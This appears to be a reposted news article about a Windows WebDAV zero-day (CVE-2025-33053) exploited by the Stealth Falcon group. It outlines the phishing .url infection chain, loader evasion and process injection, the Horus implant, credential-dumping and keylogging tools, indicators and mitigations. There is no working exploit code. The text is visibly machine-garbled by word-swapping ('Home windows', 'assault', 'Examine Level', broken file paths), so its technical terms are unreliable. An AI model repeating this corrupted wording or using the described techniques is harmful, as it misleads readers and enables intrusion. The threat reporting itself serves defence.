Close Menu
    Main Menu
    • Home
    • News
    • Tech
    • Robotics
    • ML & Research
    • AI
    • Digital Transformation
    • AI Ethics & Regulation
    • Thought Leadership in AI

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Chinese language ‘Fireplace Ant’ spies begin to chew unpatched VMware situations

    July 28, 2025

    Do falling delivery charges matter in an AI future?

    July 28, 2025

    mRAKL: Multilingual Retrieval-Augmented Information Graph Building for Low-Resourced Languages

    July 28, 2025
    Facebook X (Twitter) Instagram
    UK Tech InsiderUK Tech Insider
    Facebook X (Twitter) Instagram
    UK Tech InsiderUK Tech Insider
    Home»AI Ethics & Regulation»Microsoft Home windows WebDAV 0-Day RCE Vulnerability Actively Exploited in The Wild
    AI Ethics & Regulation

    Microsoft Home windows WebDAV 0-Day RCE Vulnerability Actively Exploited in The Wild

    Declan MurphyBy Declan MurphyJune 10, 2025No Comments4 Mins Read
    Facebook Twitter Pinterest Telegram LinkedIn Tumblr Email Reddit
    Microsoft Home windows WebDAV 0-Day RCE Vulnerability Actively Exploited in The Wild
    Share
    Facebook Twitter LinkedIn Pinterest Email Copy Link


    A essential zero-day vulnerability in Microsoft Home windows, designated CVE-2025-33053, has been actively exploited by the superior persistent risk (APT) group Stealth Falcon.

    The flaw, enabling distant code execution (RCE) by means of manipulation of a system’s working listing, was addressed by Microsoft in its June 2025 Patch Tuesday updates following CPR’s accountable disclosure. Beneath is a technical breakdown of the assault and its implications.

    Discovery and Exploitation of CVE-2025-33053

    In March 2025, CPR recognized an tried cyberattack concentrating on a Turkish protection firm.

    – Commercial –

    The assault leveraged a malicious .url file, doubtless delivered through spear-phishing emails, to take advantage of CVE-2025-33053.

    This vulnerability permits attackers to govern the working listing of reliable Home windows instruments, comparable to iediagcmd.exe, to execute malicious recordsdata hosted on an attacker-controlled WebDAV server.

    The .url file, named TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url, redirected the execution of iediagcmd.exe to a malicious route.exe on a WebDAV server (summerartcamp[.]internet@ssl@443/DavWWWRootOSYxaOjr). 

    By altering the working listing, the attacker ensured that Course of.Begin() prioritized the malicious executable over the reliable system32 model.

    This novel method, a primary for executable-based WebDAV assaults, underscores Stealth Falcon’s progressive strategy to exploiting system utilities.

    Stealth Falcon, also referred to as FruityArmor, has been lively since no less than 2012, concentrating on authorities and protection sectors within the Center East and Africa, together with Turkey, Qatar, Egypt, and Yemen.

    In accordance with Examine Level report, the group is thought for buying zero-day exploits and deploying subtle, custom-built payloads.

    Their newest marketing campaign introduces the Horus Agent, a {custom} implant constructed on the open-source Mythic C2 framework, named after the Egyptian falcon-headed god.

    An infection Chain

    Windows WebDAV 0-Day
    An infection chain (Supply: Examine Level)
    1. A phishing electronic mail delivers a malicious .url file, usually inside a ZIP archive, disguised as a reliable doc.
    2. This file exploits CVE-2025-33053, manipulating iediagcmd.exe to run a dangerous route.exe from a WebDAV server.
    3. The assault deploys Horus Loader, a C++-based loader protected by Code Virtualizer, which evades detection by means of anti-analysis methods like guide mapping of kernel32.dll and ntdll.dll and scanning for 109 antivirus processes from 17 distributors.
    4. It distracts victims by decrypting and displaying a decoy PDF, comparable to TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.
    5. The loader makes use of IPfuscation to decode a payload from IPv6 addresses, injecting it into msedge.exe utilizing ZwAllocateVirtualMemory, ZwWriteVirtualMemory, and NtResumeThread.
    6. The Horus Agent, the ultimate payload, employs {custom} OLLVM obfuscation with string encryption (shift cipher, -39) and management stream flattening, together with API hashing to resolve imports dynamically.
    7. It communicates with command-and-control servers through AES-encrypted HTTP requests, secured with HMAC-SHA256, utilizing as much as 4 domains and a killswitch date of December 31, 2099.
    8. Supported instructions embody system enumeration (survey) and stealthy shellcode injection (shinjectchunked).

    The assault employs a multi-stage an infection chain involving Spayload, a C++ Mythic implant with superior capabilities.

    Stealth Falcon’s toolkit consists of a number of undocumented instruments for post-compromise operations.

    The DC Credential Dumper targets NTDS.dit, SAM, and SYSTEM recordsdata by accessing a digital disk at C:ProgramDatads_notifier_0.vhdx utilizing the DiscUtils library, compressing the recordsdata right into a ZIP archive named ds_notifier_2.vif for exfiltration.

    The Passive Backdoor, usrprofscc.exe, is a C-based instrument that operates as a service (UsrProfSCC) with admin privileges, listening for AES-encrypted shellcode payloads.

    The Customized Keylogger, StatusReport.dll, injects into dxdiag.exe, logging keystrokes to an RC4-encrypted file at C:WindowsTemp~TNpercentLogName%.tmp.

    Mitigation and Suggestions

    Microsoft’s patch for CVE-2025-33053 is now accessible, and organizations are urged to use it instantly. CPR recommends:

    • Patching Programs: Replace Home windows to mitigate the WebDAV vulnerability.
    • Phishing Consciousness: Prepare workers to acknowledge spear-phishing emails with suspicious attachments or hyperlinks.
    • Community Monitoring: Look ahead to WebDAV-related site visitors to domains like summerartcamp[.]internet or mystartupblog.com.
    • Endpoint Safety: Deploy options to detect LOLBin abuse and unauthorized course of injections.

    The exploitation of CVE-2025-33053 by Stealth Falcon highlights the group’s technical sophistication and concentrate on high-value targets within the Center East.

    By combining zero-day exploits, {custom} implants, and evasive methods, the group poses a major risk to regional safety. Organizations ought to prioritize patching and proactive monitoring to counter this evolving risk.

    Discover this Information Attention-grabbing! Comply with us on Google Information, LinkedIn, & X to Get On the spot Updates

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Declan Murphy
    • Website

    Related Posts

    Chinese language ‘Fireplace Ant’ spies begin to chew unpatched VMware situations

    July 28, 2025

    Arizona Girl Jailed for Serving to North Korea in $17M IT Job Rip-off

    July 28, 2025

    Cyber Espionage Marketing campaign Hits Russian Aerospace Sector Utilizing EAGLET Backdoor

    July 28, 2025
    Top Posts

    Chinese language ‘Fireplace Ant’ spies begin to chew unpatched VMware situations

    July 28, 2025

    How AI is Redrawing the World’s Electrical energy Maps: Insights from the IEA Report

    April 18, 2025

    Evaluating the Finest AI Video Mills for Social Media

    April 18, 2025

    Utilizing AI To Repair The Innovation Drawback: The Three Step Resolution

    April 18, 2025
    Don't Miss

    Chinese language ‘Fireplace Ant’ spies begin to chew unpatched VMware situations

    By Declan MurphyJuly 28, 2025

    “The risk actor demonstrated a deep understanding of the goal atmosphere’s community structure and insurance…

    Do falling delivery charges matter in an AI future?

    July 28, 2025

    mRAKL: Multilingual Retrieval-Augmented Information Graph Building for Low-Resourced Languages

    July 28, 2025

    Bioinspired synthetic muscle tissue allow robotic limbs to push, carry and kick

    July 28, 2025
    Stay In Touch
    • Facebook
    • Twitter
    • Pinterest
    • Instagram
    • YouTube
    • Vimeo

    Subscribe to Updates

    Get the latest creative news from SmartMag about art & design.

    UK Tech Insider
    Facebook X (Twitter) Instagram
    • About Us
    • Contact Us
    • Privacy Policy
    • Terms Of Service
    • Our Authors
    © 2025 UK Tech Insider. All rights reserved by UK Tech Insider.

    Type above and press Enter to search. Press Esc to cancel.